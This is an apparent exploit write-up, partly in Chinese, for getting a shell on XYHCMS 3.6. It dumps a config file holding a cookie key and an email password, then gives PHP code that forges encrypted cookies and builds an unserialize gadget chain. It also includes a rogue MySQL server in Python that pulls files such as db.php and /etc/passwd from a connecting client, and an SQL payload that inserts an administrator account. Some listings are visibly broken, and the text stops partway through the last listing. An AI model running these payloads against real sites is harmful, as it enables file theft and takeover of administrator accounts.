• xyhcms getshell


    下载 xyhcms 3.6.2021 版本，并用 phpstudy 搭建。

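    /**
     * Read and decode the cookie $name (CMS version).
     *
     * The value was produced by set_cookie(): serialize() then SysCrypt::php_encrypt().
     * That transform is an unauthenticated XOR scheme, so it provides no integrity:
     * anyone who learns CFG_COOKIE_ENCODE (it sits in the runtime config file) can
     * forge an arbitrary value, and the forged bytes reach unserialize() here.
     *
     * @param string $name cookie name
     * @param string $key  key override; '' means use C('CFG_COOKIE_ENCODE')
     * @return mixed decoded value, or null when the cookie is absent
     */
    function get_cookie($name, $key = '') {
        if (!isset($_COOKIE[$name])) {
            return null;
        }
        $key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;

        $value = $_COOKIE[$name];
        $key = md5($key);
        $sc = new \Common\Lib\SysCrypt($key);
        $value = $sc->php_decrypt($value);
        // Cookie data is attacker-controlled: refuse to instantiate objects from it so a
        // forged cookie cannot drive a gadget chain. set_cookie() is documented as taking
        // an array, which still round-trips; an object payload comes back as
        // __PHP_Incomplete_Class instead of a live object.
        return unserialize($value, ['allowed_classes' => false]);
    }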
    

    这里将 cookie 中 name 对应的值先解密，再反序列化。
    解密用的 key 是随机生成的，存放在 App\Runtime\Data\668ff60dbc75e51592f9c46b573cd3eb_config 目录下的 site.php 中；其中 668ff60dbc75e51592f9c46b573cd3eb_config 是随机生成的目录名，无法猜解。

    a:78:{s:11:"CFG_WEBNAME";s:12:"我的网站";s:10:"CFG_WEBURL";s:21:"http://www.xyhcms.com";s:12:"CFG_WEBTITLE";s:12:"我的网站";s:12:"CFG_KEYWORDS";s:12:"我的网站";s:15:"CFG_DESCRIPTION";s:0:"";s:14:"CFG_THEMESTYLE";s:7:"default";s:17:"CFG_COOKIE_ENCODE";s:9:"UQAz3abDl";s:11:"CFG_POWERBY";s:0:"";s:9:"CFG_STATS";s:0:"";s:9:"CFG_BEIAN";s:0:"";s:11:"CFG_ADDRESS";s:15:"昆明北京路";s:9:"CFG_PHONE";s:10:"0871-66666";s:17:"CFG_WEBSITE_CLOSE";b:0;s:22:"CFG_WEBSITE_CLOSE_INFO";s:36:"站点维护中,请稍等一会...";s:15:"CFG_MOBILE_AUTO";b:1;s:14:"CFG_EMAIL_FROM";s:12:"ddend@qq.com";s:19:"CFG_EMAIL_FROM_NAME";s:6:"站名";s:14:"CFG_EMAIL_HOST";s:18:"smtp.exmail.qq.com";s:14:"CFG_EMAIL_PORT";i:25;s:19:"CFG_EMAIL_LOGINNAME";s:12:"ddend@qq.com";s:18:"CFG_EMAIL_PASSWORD";s:10:"123zstQhz4";s:11:"CFG_BADWORD";s:35:"艾滋病|中国共产党|111111111";s:18:"CFG_FEEDBACK_GUEST";b:1;s:15:"CFG_MEMBER_OPEN";b:1;s:22:"CFG_MEMBER_VERIFYEMAIL";b:0;s:19:"CFG_MEMBER_NOTALLOW";s:54:"www,bbs,ftp,mail,user,users,admin,administrator,xyhcms";s:18:"CFG_UPLOAD_MAXSIZE";i:2048;s:17:"CFG_IMGTHUMB_SIZE";a:2:{i:0;s:7:"300X300";i:1;s:5:"600X0";}s:17:"CFG_IMGTHUMB_TYPE";b:0;s:18:"CFG_CLICK_NUM_INIT";i:0;s:19:"CFG_UPLOAD_ROOTPATH";s:10:"./uploads/";s:19:"CFG_UPLOAD_FILE_EXT";s:49:"jpg,gif,png,jpeg,txt,doc,docx,xls,ppt,zip,rar,mp3";s:18:"CFG_UPLOAD_IMG_EXT";s:16:"jpg,gif,png,jpeg";s:19:"CFG_VERIFY_REGISTER";b:0;s:16:"CFG_VERIFY_LOGIN";b:0;s:20:"CFG_VERIFY_GUESTBOOK";b:1;s:17:"CFG_VERIFY_REVIEW";b:1;s:16:"CFG_SQL_FILESIZE";i:5242880;s:17:"CFG_DOWNLOAD_HIDE";b:1;s:21:"CFG_MOBILE_THEMESTYLE";s:7:"default";s:14:"HOME_URL_MODEL";i:3;s:22:"HOME_URL_PATHINFO_DEPR";s:1:"/";s:18:"HOME_URL_ROUTER_ON";b:0;s:20:"HOME_URL_ROUTE_RULES";a:6:{s:7:"Mobile$";s:18:"Mobile/Index/index";s:13:"Special/:id\d";s:13:"Special/shows";s:12:"Tag/:tname\w";s:9:"Tag/shows";s:9:":e/p/:p\d";s:10:"List/index";s:8:":e/:id\d";s:10:"Show/index";s:9:"/^(\w+)$/";s:15:"List/index?e=:1";}s:18:"HOME_HTML_CACHE_ON";b:0;s:20:"MOBILE_HTML_CACHE_ON";b:0;s:19:"HTML_CACHE_INDEX_ON";b:1;s:21:"HTML_CACHE_I
NDEX_TIME";i:1200;s:18:"HTML_CACHE_LIST_ON";b:1;s:20:"HTML_CACHE_LIST_TIME";i:0;s:18:"HTML_CACHE_SHOW_ON";b:1;s:20:"HTML_CACHE_SHOW_TIME";i:0;s:21:"HTML_CACHE_SPECIAL_ON";b:0;s:23:"HTML_CACHE_SPECIAL_TIME";i:0;s:15:"ONLINE_CFG_MODE";b:1;s:16:"ONLINE_CFG_STYLE";s:4:"blue";s:12:"ONLINE_CFG_H";i:1;s:19:"ONLINE_CFG_H_MARGIN";i:0;s:12:"ONLINE_CFG_V";i:2;s:19:"ONLINE_CFG_V_MARGIN";i:0;s:13:"ONLINE_CFG_QQ";a:2:{s:12:"销售咨询";s:9:"307299635";s:12:"售后服务";s:9:"307299635";}s:19:"ONLINE_CFG_WANGWANG";a:1:{s:12:"在线旺旺";s:5:"7bucn";}s:19:"ONLINE_CFG_PHONE_ON";b:1;s:16:"ONLINE_CFG_PHONE";a:2:{s:12:"销售热线";s:7:"6525411";s:12:"技术支持";s:7:"6525412";}s:23:"ONLINE_CFG_GUESTBOOK_ON";s:1:"1";s:19:"ONLINE_CFG_QQ_PARAM";s:166:"" href="http://wpa.qq.com/msgrd?v=3&uin=[客服号]&site=qq&menu=yes" class="xyh-online-item"> [客服说明]";s:25:"ONLINE_CFG_WANGWANG_PARAM";s:209:" [客服说明]";s:18:"CFG_IMAGE_WATER_ON";b:0;s:20:"CFG_IMAGE_WATER_FILE";s:27:"/Data/static/picture/sy.png";s:24:"CFG_IMAGE_WATER_POSITION";i:9;s:27:"CFG_IMAGE_WATER_DIAPHANEITY";i:100;s:28:"CFG_IMAGE_WATER_IGNORE_WIDTH";s:3:"300";s:18:"CODE_SEND_INTERVAL";i:120;s:16:"CODE_SEND_EXPIRE";i:300;s:26:"ACTIVATE_SEND_EMAIL_EXPIRE";i:172800;s:11:"SMS_SDK_ALI";a:4:{s:7:"APP_KEY";s:23:"阿里短信AccessKeyID";s:10:"APP_SECRET";s:27:"阿里短信AccessKeySecret";s:9:"SIGN_NAME";s:12:"短信签名";s:8:"SEND_URL";s:29:"https://dysmsapi.aliyuncs.com";}s:14:"SMS_SDK_TPL_ID";a:4:{s:11:"com_code1_1";s:29:"阿里短信模版通用CODE1";s:11:"reg_code1_1";s:29:"阿里短信模版注册CODE2";s:13:"login_code1_1";s:29:"阿里短信模版登录CODE3";s:14:"getpwd_code1_1";s:35:"阿里短信模版找回密码CODE4";}s:23:"HTML_CACHE_RULES_COMMON";a:3:{s:11:"index:index";a:2:{i:0;s:36:"{:module}/Index_{:action}_{p|intval}";i:1;i:1200;}s:10:"list:index";a:2:{i:0;s:51:"{:module}/List/{:action}_{e}{cid|intval}_{p|intval}";i:1;i:0;}s:10:"show:index";a:2:{i:0;s:52:"{:module}/Show/{:action}_{e}{cid|intval}_{id|intval}";i:1;i:0;}}}
    

    可以看到key为UQAz3abDl

    测试加解密

    
    class SysCrypt {
        // Outer key; __key() derives the real keystream from md5() of it.
        private $crypt_key;

        /**
         * @param string $crypt_key outer key (callers on this page pass md5(site key))
         */
        public function __construct($crypt_key) {
            $this->crypt_key = $crypt_key;
        }

        /**
         * Obfuscate $txt. A fresh 32-char md5 pad (seeded from rand(), so the output
         * differs per call) is XORed byte-wise into the plaintext and interleaved with
         * it (pad byte, then pad ^ plain); the doubled string is XORed with
         * md5($crypt_key) and base64-encoded.
         *
         * Security note: fixed-keystream XOR with no MAC. Anyone who knows the key can
         * forge values, and flipping a ciphertext bit flips the matching plaintext bit.
         * This is not authenticated encryption and gives no integrity.
         *
         * @param string $txt plaintext
         * @return string base64 ciphertext
         */
        public function php_encrypt($txt) {
            srand((double)microtime() * 1000000);
            $pad = md5(rand(0, 32000));
            $padLen = strlen($pad);
            $doubled = '';
            $j = 0;
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                if ($j == $padLen) {
                    $j = 0;
                }
                $doubled .= $pad[$j] . ($txt[$i] ^ $pad[$j]);
                $j++;
            }
            return base64_encode($this->__key($doubled, $this->crypt_key));
        }

        /**
         * Inverse of php_encrypt(): undo the outer XOR, then recover each plaintext byte
         * from its (pad, pad ^ plain) pair. An odd-length buffer reads one byte past the
         * end on the last pair, exactly as the original loop does.
         *
         * @param string $txt base64 ciphertext
         * @return string plaintext
         */
        public function php_decrypt($txt) {
            $doubled = $this->__key(base64_decode($txt), $this->crypt_key);
            $plain = '';
            $len = strlen($doubled);
            for ($i = 0; $i < $len; $i += 2) {
                $plain .= $doubled[$i + 1] ^ $doubled[$i];
            }
            return $plain;
        }

        /**
         * Repeating-key XOR of $txt with md5($encrypt_key) (32 hex chars, cycled).
         * Applying it twice with the same key is the identity.
         *
         * @param string $txt         bytes to transform
         * @param string $encrypt_key key material
         * @return string
         */
        private function __key($txt, $encrypt_key) {
            $stream = md5($encrypt_key);
            $streamLen = strlen($stream);
            $out = '';
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                $out .= $txt[$i] ^ $stream[$i % $streamLen];
            }
            return $out;
        }

        // Drop the key reference when the object goes away.
        public function __destruct() {
            $this->crypt_key = null;
        }
    }
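    /**
     * Decrypt a cookie-style value and unserialize it (test harness: the ciphertext is
     * passed in directly instead of being read from $_COOKIE).
     *
     * The CMS default key was '@^%$y5fbl'; the fallback below is the CFG_COOKIE_ENCODE
     * value from the dumped site.php.
     *
     * @param string $name ciphertext as produced by set_cookie()
     * @param string $key  site key; '' selects the dumped key (previously this
     *                     parameter was silently ignored)
     * @return mixed
     */
    function get_cookie($name, $key = '') {
        $key = $key === '' ? 'UQAz3abDl' : $key;
        $sc = new SysCrypt(md5($key));
        $value = $sc->php_decrypt($name);
        // Same sink as the CMS function: any class can be instantiated from the
        // decrypted bytes. The server-side fix is unserialize($value,
        // ['allowed_classes' => false]) plus an integrity check on the cookie.
        return unserialize($value);
    }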
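    /**
     * Serialize $args and encrypt it the way the CMS builds a cookie value (harness:
     * the ciphertext is returned, setcookie() is not called).
     *
     * Original CMS note: change $key before use; if money settlement depends on it,
     * redesign the cookie storage format. The CMS default key was '@^%$y5fbl'.
     *
     * @param mixed  $args value to store (the CMS documents it as an array)
     * @param string $key  site key; '' selects the key from the dumped site.php
     *                     (previously this parameter was silently ignored)
     * @return string base64 ciphertext
     */
    function set_cookie($args, $key = '') {
        $key = $key === '' ? 'UQAz3abDl' : $key;
        $sc = new SysCrypt(md5($key));
        return $sc->php_encrypt(serialize($args));
    }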
    // Encryption test: prints a fresh ciphertext (it differs per run because
    // php_encrypt() mixes in a random pad).
    echo set_cookie('moonsec');
    // Decryption test: the literal is one such ciphertext for 'moonsec' under the
    // key above; the author reports it prints 'moonsec'.
    echo get_cookie('VCIBaVM2CmoGIQY/U2pXOQhvCXAFYAI3BnABMg==');
    
    ?>
    

    反序列化 exp：读取数据库配置文件

    
    namespace Think\Db\Driver;
    use PDO;
    // Stand-in for the framework's MySQL driver, declaring only the properties
    // that get serialized; no framework code runs locally.
    class Mysql{
    // Client-side PDO switch that permits a server-initiated LOCAL INFILE read.
    // Defender: keep MYSQL_ATTR_LOCAL_INFILE off (PDO's default) unless a
    // feature needs it, and never let connection settings come from
    // user-controlled data.
    protected $options = array(
    PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    // Connection parameters; the dsn host is the author's lab address (the
    // Python listener later on this page binds 3306, not 3307).
    protected $config = array(
    "dsn" => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307",
    "username" => "root",
    "password" => "root"
    );
    }
    namespace Think;
    // Stand-in for the framework's base Model, holding only the properties the
    // target's unserialize() will restore.
    class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
    // Driver object carrying the connection settings above.
    $this->db = new \Think\Db\Driver\Mysql();
    $this->options['where'] = '';
    $this->pk = 'luoke';
    // 'table'/'where' presumably feed a query the framework builds from them
    // (framework code is not on this page). Defender: this is why cookie data
    // must never reach unserialize() with classes allowed.
    $this->data[$this->pk] = array(
    "table" => "xyh_admin_log",
    "where" => "id=0"
    );
    }
    }
    namespace Think\Session\Driver;
    // Session-driver stand-in: its only role in the payload is to hold the
    // Model object as $handle.
    class Memcache{
    protected $handle;
    public function __construct() {
    $this->handle = new \Think\Model();
    }
    }
    namespace Think\Image\Driver;
    // Outermost object of the payload; wraps Memcache in a private $img. The
    // framework-side lifecycle methods that walk this chain after
    // unserialize() are not shown on this page.
    class Imagick{
    private $img;
    public function __construct() {
    $this->img = new \Think\Session\Driver\Memcache();
    }
    }
    namespace Common\Lib;
    class SysCrypt{
        // Outer key; __key() derives the real keystream from md5() of it.
        private $crypt_key;

        /**
         * @param string $crypt_key outer key (callers on this page pass md5(site key))
         */
        public function __construct($crypt_key) {
            $this->crypt_key = $crypt_key;
        }

        /**
         * Obfuscate $txt. A fresh 32-char md5 pad (seeded from rand(), so the output
         * differs per call) is XORed byte-wise into the plaintext and interleaved with
         * it (pad byte, then pad ^ plain); the doubled string is XORed with
         * md5($crypt_key) and base64-encoded.
         *
         * Security note: fixed-keystream XOR with no MAC. Anyone who knows the key can
         * forge values, and flipping a ciphertext bit flips the matching plaintext bit.
         * This is not authenticated encryption and gives no integrity.
         *
         * @param string $txt plaintext
         * @return string base64 ciphertext
         */
        public function php_encrypt($txt) {
            srand((double)microtime() * 1000000);
            $pad = md5(rand(0, 32000));
            $padLen = strlen($pad);
            $doubled = '';
            $j = 0;
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                if ($j == $padLen) {
                    $j = 0;
                }
                $doubled .= $pad[$j] . ($txt[$i] ^ $pad[$j]);
                $j++;
            }
            return base64_encode($this->__key($doubled, $this->crypt_key));
        }

        /**
         * Inverse of php_encrypt(): undo the outer XOR, then recover each plaintext byte
         * from its (pad, pad ^ plain) pair. An odd-length buffer reads one byte past the
         * end on the last pair, exactly as the original loop does.
         *
         * @param string $txt base64 ciphertext
         * @return string plaintext
         */
        public function php_decrypt($txt) {
            $doubled = $this->__key(base64_decode($txt), $this->crypt_key);
            $plain = '';
            $len = strlen($doubled);
            for ($i = 0; $i < $len; $i += 2) {
                $plain .= $doubled[$i + 1] ^ $doubled[$i];
            }
            return $plain;
        }

        /**
         * Repeating-key XOR of $txt with md5($encrypt_key) (32 hex chars, cycled).
         * Applying it twice with the same key is the identity.
         *
         * @param string $txt         bytes to transform
         * @param string $encrypt_key key material
         * @return string
         */
        private function __key($txt, $encrypt_key) {
            $stream = md5($encrypt_key);
            $streamLen = strlen($stream);
            $out = '';
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                $out .= $txt[$i] ^ $stream[$i % $streamLen];
            }
            return $out;
        }

        // Drop the key reference when the object goes away.
        public function __destruct() {
            $this->crypt_key = null;
        }
    }
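    /**
     * Decrypt a cookie-style value and unserialize it (harness: value passed directly).
     *
     * @param string $name ciphertext produced by set_cookie()
     * @param string $key  site key (CFG_COOKIE_ENCODE); '' uses the hard-coded lab key
     *                     (previously this parameter was silently ignored)
     * @return mixed
     */
    function get_cookie($name, $key = '') {
        $key = $key === '' ? 'P4tzizR6d' : $key;
        $sc = new \Common\Lib\SysCrypt(md5($key));
        $value = $sc->php_decrypt($name);
        // Same sink as the CMS: any class can be instantiated from the decrypted bytes.
        // The CMS-side fix is unserialize($value, ['allowed_classes' => false]) plus an
        // integrity check (HMAC) on the cookie.
        return unserialize($value);
    }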
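    /**
     * Serialize $args and encrypt it the way the CMS builds a cookie value.
     *
     * @param mixed  $args value to store (the CMS documents it as an array)
     * @param string $key  site key; '' uses the hard-coded lab key (previously this
     *                     parameter was silently ignored)
     * @return string base64 ciphertext
     */
    function set_cookie($args, $key = '') {
        $key = $key === '' ? 'P4tzizR6d' : $key;
        $sc = new \Common\Lib\SysCrypt(md5($key));
        return $sc->php_encrypt(serialize($args));
    }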
    
    
    // Build the nested object graph and encode it exactly as the CMS encodes a cookie.
    $b = new \Think\Image\Driver\Imagick();
    $a = set_cookie($b,'');
    // '+' is the one base64 character that form/URL decoding turns into a space, so
    // it is percent-encoded before the value is submitted. Defender: rejecting object
    // payloads at the unserialize() sink (allowed_classes => false) neutralises this
    // value regardless of how it is delivered.
    echo str_replace('+','%2B',$a);
    

    利用恶意 MySQL 服务端读取数据库配置文件

    #!/usr/bin/env python
    #coding: utf8
    
    
    import socket
    import asyncore
    import asynchat
    import struct
    import random
    import logging
    import logging.handlers
    
    
    
    PORT = 3306  # port the rogue server binds (see mysql_listener)

    log = logging.getLogger(__name__)

    log.setLevel(logging.INFO)
    # Despite the name this is a file handler, not a formatter. Whatever a
    # connecting client sends back as file contents is written here via
    # log.info() in found_terminator().
    tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
    tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
    log.addHandler(
        tmp_format
    )

    # Paths the server asks a connecting client to send; one entry is chosen at
    # random per query. The active entry is the author's lab path; the
    # commented ones are earlier variants.
    filelist = (
       #'/etc/passwd',
       #'/www/wwwroot/www.xycms.com/App/Common/Conf/db.php',
       'D:/phpstudy_pro/WWW/www.xyhcms.com/App/Common/Conf/db.php',
    )


    #================================================
    #=======No need to change after this lines=======
    #================================================

    __author__ = 'Gifts'
    
    def daemonize():
        """Detach from the terminal (POSIX only): double fork, new session,
        and stdin/stdout/stderr pointed at /dev/null.

        Uses ``xrange``, so this script targets Python 2. Not called by
        default (the call at the bottom of the file is commented out).
        """
        import os, warnings
        if os.name != 'posix':
            warnings.warn('Cant create daemon on non-posix system')
            return

        if os.fork(): os._exit(0)
        os.setsid()
        if os.fork(): os._exit(0)
        os.umask(0o022)
        null=os.open('/dev/null', os.O_RDWR)
        for i in xrange(3):
            try:
                os.dup2(null, i)
            except OSError as e:
                if e.errno != 9: raise  # errno 9 (EBADF): descriptor already closed
        os.close(null)
    
    
    class LastPacket(Exception):
        """Control-flow signal: the current exchange is complete, reset to
        wait for the next client command (see found_terminator)."""
        pass
    
    
    class OutOfOrder(Exception):
        """Control-flow signal: a packet arrived with an unexpected sequence
        number; the connection is closed."""
        pass
    
    
    class mysql_packet(object):
        """One MySQL wire packet: 3-byte little-endian length, 1-byte sequence
        number, then the payload. Python 2 code: payload and str(self) are
        byte strings.
        """
        # NOTE(review): the struct format strings were lost in the rendered
        # listing (the quotes are unterminated). From the pack() calls below,
        # the short header takes (len_low16, len_high8, seq) and the long one
        # a four-field variant - confirm against the original tool.
        packet_header = struct.Struct(')
        packet_header_long = struct.Struct(')
        def __init__(self, packet_type, payload):
            # Passing a received packet instead of an int numbers this packet
            # as its reply (received sequence + 1).
            if isinstance(packet_type, mysql_packet):
                self.packet_num = packet_type.packet_num + 1
            else:
                self.packet_num = packet_type
            self.payload = payload

        def __str__(self):
            # Serialize header + payload. NOTE(review): the >= 64 KiB branch
            # packs four values with the three-field packet_header; it looks
            # like packet_header_long was intended there.
            payload_len = len(self.payload)
            if payload_len < 65536:
                header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
            else:
                header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)

            result = "{0}{1}".format(
                header,
                self.payload
            )
            return result

        def __repr__(self):
            return repr(str(self))

        @staticmethod
        def parse(raw_data):
            # raw_data is sequence byte + payload; the three length bytes were
            # already consumed by the LEN state in found_terminator().
            packet_num = ord(raw_data[0])
            payload = raw_data[1:]

            return mysql_packet(packet_num, payload)
    
    
    class http_request_handler(asynchat.async_chat):
        """Per-connection handler speaking just enough of the MySQL server
        protocol to accept any login and answer each query with a LOCAL INFILE
        request for a path from ``filelist``; the bytes the client sends back
        are written to ``mysql.log``.

        Python 2 code: ``str`` is bytes throughout. Defender notes: a client
        only hands over a file if LOCAL INFILE is enabled on its side
        (PDO::MYSQL_ATTR_LOCAL_INFILE / local_infile), so keeping that off is
        the primary control; a web host opening an outbound MySQL connection
        to an unexpected address is the observable artefact.
        """

        def __init__(self, addr):
            # addr is the (socket, peer address) pair returned by accept().
            asynchat.async_chat.__init__(self, sock=addr[0])
            self.addr = addr[1]
            self.ibuffer = []
            # Read the 3-byte packet length first; see found_terminator().
            self.set_terminator(3)
            self.state = 'LEN'
            self.sub_state = 'Auth'
            self.logined = False  # set here only; not read in this file
            # Server greeting with sequence number 0: protocol byte, version
            # string, then a fixed blob of handshake fields ending in the auth
            # plugin name "mysql_native_password".
            self.push(
                mysql_packet(
                    0,
                    "".join((
                        '\x0a',  # Protocol
                        '5.6.28-0ubuntu0.14.04.1' + '\0',
                        '\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
                    ))            )
            )

            # Sequence number expected on the next client packet.
            self.order = 1
            self.states = ['LOGIN', 'CAPS', 'ANY']  # not read anywhere in this file

        def push(self, data):
            # Everything is stringified first, so mysql_packet.__str__ does the
            # framing; pushing None sends the literal bytes "None".
            log.debug('Pushed: %r', data)
            data = str(data)
            asynchat.async_chat.push(self, data)

        def collect_incoming_data(self, data):
            log.debug('Data recved: %r', data)
            self.ibuffer.append(data)

        def found_terminator(self):
            """Terminator-driven state machine.

            LEN:        3 length bytes received; arm a terminator for the
                        sequence byte plus payload (hence the ``+ 1``).
            MoreLength: entered when the length is >= 64 KiB; only a zero
                        high byte is accepted. No new terminator is armed
                        before it, so this path looks incomplete - unverified.
            Data:       a whole packet; dispatched on sequence number and
                        ``sub_state`` ('Auth', 'File', or None between
                        commands).
            """
            data = "".join(self.ibuffer)
            self.ibuffer = []

            if self.state == 'LEN':
                len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
                if len_bytes < 65536:
                    self.set_terminator(len_bytes)
                    self.state = 'Data'
                else:
                    self.state = 'MoreLength'
            elif self.state == 'MoreLength':
                if data[0] != '\0':
                    self.push(None)
                    self.close_when_done()
                else:
                    self.state = 'Data'
            elif self.state == 'Data':
                packet = mysql_packet.parse(data)
                try:
                    if self.order != packet.packet_num:
                        raise OutOfOrder()
                    else:
                        # Fix ?
                        # The reply below will carry packet_num + 1, so the
                        # client's next packet is expected at packet_num + 2.
                        self.order = packet.packet_num + 2
                    if packet.packet_num == 0:
                        # Sequence 0 = a new client command; order is reset
                        # to 0 after each completed exchange (LastPacket).
                        if packet.payload[0] == '\x03':
                            # Query command: instead of a result set, reply
                            # 0xFB + path, which asks the client to upload it.
                            log.info('Query')

                            filename = random.choice(filelist)
                            PACKET = mysql_packet(
                                packet,
                                '\xFB{0}'.format(filename)
                            )
                            self.set_terminator(3)
                            self.state = 'LEN'
                            self.sub_state = 'File'
                            self.push(PACKET)
                        elif packet.payload[0] == '\x1b':
                            # Logged as SelectDB; answered with an EOF-style
                            # packet and the exchange ends.
                            log.info('SelectDB')
                            self.push(mysql_packet(
                                packet,
                                '\xfe\x00\x00\x02\x00'
                            ))
                            raise LastPacket()
                        elif packet.payload[0] in '\x02':
                            # Answered with a plain OK packet.
                            self.push(mysql_packet(
                                packet, '\0\0\0\x02\0\0\0'
                            ))
                            raise LastPacket()
                        elif packet.payload == '\x00\x01':
                            self.push(None)
                            self.close_when_done()
                        else:
                            raise ValueError()
                    else:
                        if self.sub_state == 'File':
                            # Client is streaming the requested file; each
                            # chunk is logged verbatim.
                            log.info('-- result')
                            log.info('Result: %r', data)

                            if len(data) == 1:
                                # Sequence byte only = empty packet = end of
                                # file; acknowledge with OK.
                                self.push(
                                    mysql_packet(packet, '\0\0\0\x02\0\0\0')
                                )
                                raise LastPacket()
                            else:
                                # More chunks follow with no server reply in
                                # between, so expect the very next number.
                                self.set_terminator(3)
                                self.state = 'LEN'
                                self.order = packet.packet_num + 1

                        elif self.sub_state == 'Auth':
                            # Any credentials are accepted: reply OK without
                            # looking at the login packet.
                            self.push(mysql_packet(
                                packet, '\0\0\0\x02\0\0\0'
                            ))
                            raise LastPacket()
                        else:
                            log.info('-- else')
                            raise ValueError('Unknown packet')
                except LastPacket:
                    # Exchange finished: wait for the next command at seq 0.
                    log.info('Last packet')
                    self.state = 'LEN'
                    self.sub_state = None
                    self.order = 0
                    self.set_terminator(3)
                except OutOfOrder:
                    log.warning('Out of order')
                    self.push(None)
                    self.close_when_done()
            else:
                log.error('Unknown state')
                self.push('None')
                self.close_when_done()
    
    
    class mysql_listener(asyncore.dispatcher):
        """Listening socket on all interfaces at PORT; every accepted
        connection gets its own http_request_handler."""
        def __init__(self, sock=None):
            asyncore.dispatcher.__init__(self, sock)

            if not sock:
                self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
                self.set_reuse_addr()
                try:
                    self.bind(('', PORT))
                except socket.error:
                    # Bind failure (port busy, or no privilege for 3306)
                    # exits silently; nothing is logged.
                    exit()

                self.listen(5)

        def handle_accept(self):
            pair = self.accept()

            if pair is not None:
                log.info('Conn from: %r', pair[1])
                # The local name is never used; presumably asyncore's socket
                # map keeps the handler alive.
                tmp = http_request_handler(pair)
    
    
    # Bind PORT and run the asyncore event loop until the process is killed.
    z = mysql_listener()
    # daemonize()
    asyncore.loop()
    
    

    用 Python 直接运行，监听端口为 3306。

    登录之后将密文填到 nickname 里即可触发反序列化。
    添加管理员用户

    namespace Think\Db\Driver;
    use PDO;
    // Stand-in for the framework's MySQL driver, declaring only the properties
    // that get serialized; no framework code runs locally.
    class Mysql{
    // Client-side PDO switch that permits a server-initiated LOCAL INFILE read.
    // Defender: keep MYSQL_ATTR_LOCAL_INFILE off (PDO's default) unless a
    // feature needs it, and never let connection settings come from
    // user-controlled data.
    protected $options = array(
    PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    // Connection parameters for the target's own database (localhost here,
    // unlike the file-read variant above).
    protected $config = array(
    "dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
    "username" => "root",
    "password" => "123456"
    );
    }
    namespace Think;
    // Stand-in for the framework's base Model, holding only the properties the
    // target's unserialize() will restore.
    class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
    // Driver object carrying the connection settings above.
    $this->db = new \Think\Db\Driver\Mysql();
    $this->options['where'] = '';
    $this->pk = 'luoke';
    // 'where' carries a stacked statement after the id predicate. It can only
    // take effect if the framework interpolates the value into SQL and the
    // driver allows multiple statements (framework code is not on this page).
    // Defender: bound parameters plus PDO::ATTR_EMULATE_PREPARES => false
    // block both, and allowed_classes => false at the cookie sink stops the
    // chain before it gets here.
    $this->data[$this->pk] = array(
    "table" => "xyh_admin_log",
    "where" => "id=0;insert into www_xycms_com.xyh_admin
    (id,username,password,encrypt,user_type,is_lock,login_num) VALUES
    (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"
    );
    /**test/123456**/
    }
    }
    namespace Think\Session\Driver;
    // Session-driver stand-in: its only role in the payload is to hold the
    // Model object as $handle.
    class Memcache{
    protected $handle;
    public function __construct() {
    $this->handle = new \Think\Model();
    }
    }
    namespace Think\Image\Driver;
    // Outermost object of the payload; wraps Memcache in a private $img. The
    // framework-side lifecycle methods that walk this chain after
    // unserialize() are not shown on this page.
    class Imagick{
    private $img;
    public function __construct() {
    $this->img = new \Think\Session\Driver\Memcache();
    }
    }
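    namespace Common\Lib;
    class SysCrypt{
        // Outer key; __key() derives the real keystream from md5() of it.
        private $crypt_key;

        /**
         * @param string $crypt_key outer key (callers on this page pass md5(site key))
         */
        public function __construct($crypt_key) {
            $this->crypt_key = $crypt_key;
        }

        /**
         * Obfuscate $txt. A fresh 32-char md5 pad (seeded from rand(), so the output
         * differs per call) is XORed byte-wise into the plaintext and interleaved with
         * it (pad byte, then pad ^ plain); the doubled string is XORed with
         * md5($crypt_key) and base64-encoded.
         *
         * Security note: fixed-keystream XOR with no MAC. Anyone who knows the key can
         * forge values, and flipping a ciphertext bit flips the matching plaintext bit.
         * This is not authenticated encryption and gives no integrity.
         *
         * @param string $txt plaintext
         * @return string base64 ciphertext
         */
        public function php_encrypt($txt) {
            srand((double)microtime() * 1000000);
            $pad = md5(rand(0, 32000));
            $padLen = strlen($pad);
            $doubled = '';
            $j = 0;
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                if ($j == $padLen) {
                    $j = 0;
                }
                $doubled .= $pad[$j] . ($txt[$i] ^ $pad[$j]);
                $j++;
            }
            return base64_encode($this->__key($doubled, $this->crypt_key));
        }

        /**
         * Inverse of php_encrypt(): undo the outer XOR, then recover each plaintext byte
         * from its (pad, pad ^ plain) pair. An odd-length buffer reads one byte past the
         * end on the last pair.
         *
         * @param string $txt base64 ciphertext
         * @return string plaintext
         */
        public function php_decrypt($txt) {
            $doubled = $this->__key(base64_decode($txt), $this->crypt_key);
            $plain = '';
            $len = strlen($doubled);
            for ($i = 0; $i < $len; $i += 2) {
                $plain .= $doubled[$i + 1] ^ $doubled[$i];
            }
            return $plain;
        }

        /**
         * Repeating-key XOR of $txt with md5($encrypt_key) (32 hex chars, cycled).
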